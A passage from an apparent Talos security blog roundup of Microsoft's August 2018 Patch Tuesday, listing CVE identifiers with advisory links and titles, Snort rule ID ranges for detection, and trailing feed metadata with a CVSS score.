- [CVE-2018-8204](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8204) Device Guard Code Integrity Policy Security Feature Bypass Vulnerability
- [CVE-2018-8253](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8253) Cortana Elevation of Privilege Vulnerability
- [CVE-2018-8316](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8316) Internet Explorer Remote Code Execution Vulnerability
- [CVE-2018-8339](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8339) Windows Installer Elevation of Privilege Vulnerability
- [CVE-2018-8341](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8341) Windows Kernel Information Disclosure Vulnerability
- [CVE-2018-8342](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8342) Windows NDIS Elevation of Privilege Vulnerability
- [CVE-2018-8343](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8343) Windows NDIS Elevation of Privilege Vulnerability
- [CVE-2018-8346](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8346) LNK Remote Code Execution Vulnerability
- [CVE-2018-8347](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8347) Windows Kernel Elevation of Privilege Vulnerability
- [CVE-2018-8348](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8348) Windows Kernel Information Disclosure Vulnerability
- [CVE-2018-8349](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8349) Microsoft COM for Windows Remote Code Execution Vulnerability
- [CVE-2018-8351](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8351) Microsoft Edge Information Disclosure Vulnerability
- [CVE-2018-8353](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8353) Scripting Engine Memory Corruption Vulnerability
- [CVE-2018-8357](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8357) Microsoft Browser Elevation of Privilege Vulnerability
- [CVE-2018-8358](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8358) Microsoft Browser Security Feature Bypass Vulnerability
- [CVE-2018-8360](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8360) .NET Framework Information Disclosure Vulnerability
- [CVE-2018-8370](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8370) Microsoft Edge Information Disclosure Vulnerability
- [CVE-2018-8375](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8375) Microsoft Excel Remote Code Execution Vulnerability
- [CVE-2018-8376](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8376) Microsoft PowerPoint Remote Code Execution Vulnerability
- [CVE-2018-8378](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8378) Microsoft Office Information Disclosure Vulnerability
- [CVE-2018-8379](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8379) Microsoft Excel Remote Code Execution Vulnerability
- [CVE-2018-8382](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8382) Microsoft Excel Information Disclosure Vulnerability
- [CVE-2018-8383](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8383) Microsoft Edge Spoofing Vulnerability
- [CVE-2018-8389](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8389) Scripting Engine Memory Corruption Vulnerability
- [CVE-2018-8394](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8394) Windows GDI Information Disclosure Vulnerability
- [CVE-2018-8396](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8396) Windows GDI Information Disclosure Vulnerability
- [CVE-2018-8398](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8398) Windows GDI Information Disclosure Vulnerability
- [CVE-2018-8399](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8399) Win32k Elevation of Privilege Vulnerability
- [CVE-2018-8400](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8400) DirectX Graphics Kernel Elevation of Privilege Vulnerability
- [CVE-2018-8401](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8401) DirectX Graphics Kernel Elevation of Privilege Vulnerability
- [CVE-2018-8404](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8404) Win32k Elevation of Privilege Vulnerability
- [CVE-2018-8405](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8405) DirectX Graphics Kernel Elevation of Privilege Vulnerability
- [CVE-2018-8406](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8406) DirectX Graphics Kernel Elevation of Privilege Vulnerability
- [CVE-2018-8412](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8412) Microsoft (MAU) Office Elevation of Privilege Vulnerability
- [CVE-2018-8414](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8414) Windows Shell Remote Code Execution Vulnerability

### Coverage

In response to these vulnerability disclosures, Talos is releasing the following Snort rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Snort Rules: 45877-45878, 46548-46549, 46999-47002, 47474-47493, 47495-47496, 47503-47504, 47512-47513, 47515-47520

", "modified": "2018-08-14T18:26:00", "published": "2018-08-14T11:26:00", "id": "TALOSBLOG:A9E55A97439608C62C1BF62669B8074A", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/8ZjMNLg4_Bs/ms-tuesday.html", "type": "talosblog", "title": "Microsoft Tuesday August 2018", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}